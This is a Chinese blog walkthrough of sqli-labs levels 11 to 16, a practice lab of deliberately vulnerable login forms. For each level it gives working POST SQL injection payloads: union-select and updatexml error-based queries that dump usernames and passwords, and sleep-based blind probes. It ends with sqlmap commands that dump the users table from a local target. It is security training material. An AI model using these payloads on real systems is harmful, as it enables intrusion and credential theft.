前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >Sqlilabs通关笔记(三)

Sqlilabs通关笔记(三)

作者头像
网络安全自修室
发布2020-07-22 16:59:27
6170
发布2020-07-22 16:59:27
举报
文章被收录于专栏:网络安全自修室

第十一关 基于错误的POST单引号字符型注入

已经显示输入框了,说明是POST提交方式的注入

注入点判断

  1. 在输入框中输入单引号报错,说明为简单的字符型注入
  2. 根据之前GET闯关注入的经验,只是换成post提交
  3. 查看字段数,判断为2个字段

uname=admin' order by 2#&passwd=&submit=Submit 正常 uname=admin' order by 3#&passwd=&submit=Submit 不正常

  1. 直接上payload

payload直接查出数据库所有数据

uname=-admin' union select group_concat(username,password),2 from users#&passwd=&submit=Submit

第十二关 基于错误的POST双引号字符型注入

  1. 这关与上一关不同在于需要通过双引号来进行闭合,payload类似

uname=-admin") union select group_concat(username,password),2 from users#&passwd=&submit=Submit

第十三关 基于POST单引号双注入变形

  1. 通过输入反斜杠报错,可以通过')来进行闭合
  2. 猜测是报错注入,唯一不同的post传入
  3. 直接上payload,可以直接导出所有数据

uname=') and (updatexml(1,concat(0x7e,(select group_concat(username,password) from users),0x7e),1))#&passwd=&submit=Submit

第十四关 基于POST双引号双注入变形

  1. 与十三关类似,只是需要通过双引号进行闭合
  2. 直接上payload

uname=" and (updatexml(1,concat(0x7e,(select group_concat(username,password) from users),0x7e),1))#&passwd=&submit=Submit

第十五关 基于POST单引号布尔型时间盲注

  1. 使用了\ ’ 等各种姿势网页硬是没有变化
  2. 可能是时间盲注
  3. 直接用uname=admin' and sleep(10)#&passwd=1&submit=Submit 发现确是时间盲注
  4. 直接上sqlmap 或者 写个脚本跑就够了和之前GET时间盲注类似

第十六关 基于POST双引号布尔型时间盲注

  1. 和十五关类似,只是用双引号闭合

uname=admin") and sleep(10)#&passwd=1&submit=Submit

SQLMAP注入

  1. 通过burpsuit抓取数据包导入进sqlmap进行注入检测
  2. 以less11为例通过bp抓取数据包
  1. 选择导出文件为1.txt

如果要指定参数注入检测可以将该参数修改成*

  1. 使用sqlmap载入导出的数据包并进行注入检测

sqlmap -r "1.txt" -p uname -D security -T users -C username,password --dump --technique ES --batch --threads 10

  1. 也可以使用--data传入post参数

sqlmap -u "http://127.0.0.1/sqlilabs2/Less-15/" -data "uname=admin&passwd=admin&submit=Submit" --b atch --threads 10 --technique T --dbs

  • -r 读取抓包文件
  • -p 需要检测的参数
  • --technique 需要检测的注入方式
    • E 基于报错的注入
    • S 通过sqlmap读取文件系统、操作系统、注册表必须 使用该参数,可多语句查询注入
  • --batch 默认选择
  • --threads 线程数
  • -data 传入post参数(免去抓包)
本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2020-02-28,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 网络安全自修室 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 第十一关 基于错误的POST单引号字符型注入
    • 注入点判断
    • 第十二关 基于错误的POST双引号字符型注入
    • 第十三关 基于POST单引号双注入变形
    • 第十四关 基于POST双引号双注入变形
    • 第十五关 基于POST单引号布尔型时间盲注
    • 第十六关 基于POST双引号布尔型时间盲注
      • SQLMAP注入
      领券
      问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档